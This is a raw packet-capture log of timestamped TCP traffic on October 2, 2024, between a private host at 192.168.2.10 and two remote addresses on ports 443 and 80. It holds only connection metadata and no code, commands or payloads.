                                                              Oct 2, 2024 05:29:25.952385902 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.952414036 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.952493906 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.952507019 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.952578068 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.958832026 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.958838940 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.958929062 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.958929062 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.958940983 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.959009886 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.998521090 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.998544931 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.998788118 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:25.998805046 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:25.998862028 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.024836063 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.024854898 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.024956942 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.024971962 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.025017023 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.025207043 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.025223970 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.025260925 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.025266886 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.025312901 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.025312901 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.084849119 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.084878922 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.084976912 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.084990978 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.085076094 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.090693951 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.090714931 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.090846062 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.090862989 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.090919971 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.091217041 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.091233015 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.091317892 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.091325998 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.091366053 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.150733948 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.150753021 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.150830030 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.150844097 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.150897026 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.150897026 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.157181978 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157197952 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157269955 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.157279968 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157346964 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.157671928 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157685041 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157723904 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.157731056 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.157803059 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.217629910 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.217650890 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.217751026 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.217770100 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.217823029 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.328957081 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.328979015 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.329034090 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.329047918 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.329063892 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.329149961 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349323988 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349337101 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349550962 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349566936 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349685907 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349843025 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349855900 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.349946022 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349946022 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.349952936 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.350001097 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.356503010 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.356518030 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.356587887 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.356599092 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.356636047 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.356661081 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.415853977 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.415870905 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.415991068 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.416002035 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.416079998 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.423029900 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.423046112 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.423106909 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.423115015 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.423130035 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.423151016 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.481825113 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.481842041 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.481905937 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.481915951 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.481977940 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.481977940 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.488615036 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.488632917 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.488684893 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.488691092 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.488746881 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.488746881 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.547872066 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.547887087 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.547946930 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.547955990 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.548012018 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.555083036 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.555098057 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.555207968 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.555212975 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.555254936 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.594264984 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.594283104 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.594405890 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.594414949 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.594464064 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.620148897 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.620173931 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.620302916 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.620313883 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.620404005 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.659837008 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.659856081 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.660079956 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.660090923 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.660164118 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.680860043 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.680875063 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.680967093 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.680974007 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.681016922 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.681016922 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.687973022 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.687988043 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.688051939 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.688059092 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.688097000 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.746963978 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.746979952 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.747118950 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.747118950 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.747129917 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.747195959 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.754125118 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.754139900 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.754215002 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.754221916 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.754316092 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.813039064 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.813055038 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.813133001 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.813143015 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.813189030 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.820483923 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.820498943 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.820621967 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.820627928 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.820705891 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.857925892 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.857961893 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.858073950 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.858079910 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.858197927 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.879179955 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.879266024 CEST44349706207.241.227.240192.168.2.10
                                                              Oct 2, 2024 05:29:26.879311085 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.879390001 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.881843090 CEST49706443192.168.2.10207.241.227.240
                                                              Oct 2, 2024 05:29:26.967834949 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:26.972645044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:26.972809076 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:26.972961903 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:26.977679014 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676702976 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676723957 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676738024 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676748991 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676759958 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676769972 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676783085 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676832914 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.676836014 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676847935 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676866055 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.676903963 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.676966906 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.681711912 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.681724072 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.681736946 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.681813002 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.723218918 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.805809021 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.805840969 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.805860996 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.805973053 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806060076 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806071043 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806085110 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806096077 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806142092 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.806142092 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.806142092 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.806142092 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.806716919 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806751966 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806761980 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806811094 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806822062 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.806873083 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.806873083 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.807590008 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.807609081 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.807621002 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.807686090 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.807697058 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.807774067 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.807774067 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.807774067 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.808371067 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.808388948 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.808413982 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.808497906 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.808521986 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.808542967 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.808542967 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.811060905 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.811393023 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.935204983 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935226917 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935239077 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935250044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935262918 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935267925 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935323954 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935364962 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935375929 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935405970 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.935405970 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.935405970 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.935424089 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935436010 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935506105 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.935760021 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935770035 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935781956 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935849905 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935859919 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.935859919 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.935861111 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.935872078 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936103106 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.936244965 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936255932 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936266899 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936301947 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.936346054 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936351061 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.936357975 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936369896 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936381102 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936541080 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.936541080 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.936849117 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936861038 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936872005 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936913013 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.936939955 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936949968 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936960936 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.936973095 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937057018 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.937057018 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.937067032 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937077999 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937098026 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937109947 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937124014 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.937181950 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.937820911 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937832117 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937844038 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937887907 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.937927008 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937937975 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937948942 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937959909 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.937980890 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.937980890 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.937995911 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.938000917 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.938023090 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.938033104 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:27.938055992 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:27.988951921 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.064408064 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064433098 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064445972 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064456940 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064480066 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064491034 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064501047 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064511061 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064517975 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.064522982 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064538002 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064549923 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.064553976 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064564943 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064588070 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.064620018 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.064929008 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064979076 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.064989090 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.065022945 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.065023899 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.065032959 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.065162897 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.065190077 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.065201044 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.065212011 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.065269947 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.065282106 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.065289974 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.065289974 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.065320015 CEST4970780192.168.2.1045.90.89.123
                                                              Oct 2, 2024 05:29:28.065476894 CEST804970745.90.89.123192.168.2.10
                                                              Oct 2, 2024 05:29:28.065495968 CEST804970745.90.89.123192.168.2.10
